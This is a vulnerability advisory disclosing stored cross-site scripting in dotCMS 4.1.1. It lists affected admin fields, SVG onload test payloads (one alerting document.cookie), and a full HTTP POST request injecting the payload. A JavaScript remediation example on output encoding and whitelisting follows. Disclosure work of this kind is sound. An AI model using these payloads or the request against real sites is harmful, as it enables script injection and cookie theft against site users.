[+] CVE ID: Pending 
[+] Credits: Brett DeWall aka @xbadbiddyx 
[+] Websites: https://github.com/badbiddy 
[+] Source: https://raw.githubusercontent.com/badbiddy/Vulnerability-Disclosure/master/dotCMS%20%3E%204.1.1%20-%20Stored%20XSS

Vendor:
==========================
dotCMS
https://www.dotcms.com/


Product:
===========
dotCMS
Version: 4.1.1

Vulnerability Type:
==========================
Stored Cross-Site Scripting (XSS)


Vulnerability Details:
=====================
The application is vulnerable to stored XSS within multiple sections of the application. It does not
sanitize user-supplied input and renders injected JavaScript code in users' browsers.
Attackers use this class of vulnerability to inject malicious JavaScript code such as a malicious redirect,
cryptocurrency mining, or an exploit kit.


Replication:
=====================
1) Navigate to the following example pages:
  - https://demo.dotcms.com/dotAdmin/#/c/vanity-urls -- Title parameter
  - https://demo.dotcms.com/dotAdmin/#/c/containers -- Description parameter
  - https://demo.dotcms.com/dotAdmin/#/c/templates -- Description parameter

2) Each of these areas of the application allows unsanitized input to be supplied by a user.
The following payload was used in testing: <svg/onload=alert('XSS')> or, URL-encoded, "%3Csvg%2Fonload%3Dalert%28document.cookie%29%3E"

3) Perform the normal function within the application to create a new Vanity URL, Container, or Template;
inserting the payload into the specific parameter location triggers the vulnerability.


Example HTTP Request with XSS payload:
=====================

HTTP Request:

POST /c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=containers&p_p_action=1&p_p_state=maximized&p_p_mode=view&_containers_struts_action=%2Fext%2Fcontainers%2Fedit_container HTTP/1.1
Host: demo.dotcms.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0

_containers_cmd=add&_containers_referer=%252Fc%252Fportal%252Flayout%253Fp_l_id%253Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%2526p_p_id%253Dcontainers%2526p_p_action%253D1%2526p_p_state%253Dmaximized%2526_containers_pageNumber%253D1%2526_containers_struts_action%253D%25252Fext%25252Fcontainers%25252Fview_containers&_containers_redirect=https%3A%2F%2Fdemo.dotcms.com%2Fc%2Fportal%2Flayout%3Fp_l_id%3Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%26p_p_id%3Dcontainers%26p_p_action%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_containers_struts_action%3D%252Fext%252Fcontainers%252Fview_containers&_containers_subcmd=&_containers_inode=69956b08-e4d6-4f97-8101-55446da1e1cb&userId=dotcms.org.1&hostId=48190c8c-42c4-46af-8d1a-0cd5db894797&title=TEST&friendlyName=TEST%3Csvg%2Fonload%3Dalert%28document.cookie%29%3E&maxContentlets=0&preLoopMask=&preLoop=&toggleEditorPreLoop=on&structureInode=4c441ada-944a-43af-a653-9bb4f3f0cb2b&toggleEditorCodeMultiple=on&codeMask=TEST&code=TEST&toggleEditorCode=on&postLoopMask=&postLoop=&toggleEditorPostLoop=on&notes=&permissionsUserSelector=


Remediation Details:
=====================
Prevent the application from rendering JavaScript supplied by the end user.
Create a whitelist of allowed characters for each input field.
Sanitize user-supplied input server-side.
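The following is an added illustration of the remediation above and is not dotCMS code (dotCMS itself is Java; the example is in JavaScript for portability). It takes a constructed excerpt of the form body from the request shown earlier, shows the vulnerable concatenation beside an output-encoded rendering, and applies a whitelist check to the field. The helper names (parseFormBody, escapeHtml, renderVulnerable, renderHardened, isValidTitle, countTags) and the whitelist policy are assumptions for this example.

```javascript
// Added example (not dotCMS code): parse the advisory's form body, render the stored
// field both unsafely and safely, and apply a server-side whitelist to the field.

// Constructed excerpt of the POST body from the advisory (only the fields needed here).
const SAMPLE_BODY =
  'title=TEST&friendlyName=TEST%3Csvg%2Fonload%3Dalert%28document.cookie%29%3E&maxContentlets=0';

// Parse an application/x-www-form-urlencoded body into a plain object (percent-decoded).
function parseFormBody(body) {
  return Object.fromEntries(new URLSearchParams(body).entries());
}

// HTML entity encoding for text placed between tags or inside a double-quoted
// attribute value: every character that can open markup or break out is escaped.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Vulnerable rendering: raw concatenation of the stored value into the page,
// which is the behaviour the advisory describes.
function renderVulnerable(description) {
  return `<div class="description">${description}</div>`;
}

// Hardened rendering: the stored value is encoded at output time, so the
// browser sees text, not an <svg> element with an onload handler.
function renderHardened(description) {
  return `<div class="description">${escapeHtml(description)}</div>`;
}

// Server-side whitelist for a short free-text field such as Title or Description.
// Hypothetical policy: letters, digits, whitespace and a few punctuation marks only.
const TITLE_WHITELIST = /^[\p{L}\p{N} .,_\-:()!?]{1,255}$/u;
function isValidTitle(value) {
  return TITLE_WHITELIST.test(value);
}

// Count element start tags in rendered HTML; the wrapper <div> contributes one,
// so anything above one means the stored value introduced its own markup.
function countTags(html) {
  return (html.match(/<[a-z]+/gi) || []).length;
}
```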


Timeline:
=====================
2017-10-06 - Issue Reported to Vendor


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security-related information
or exploits by the author or elsewhere.

badbiddy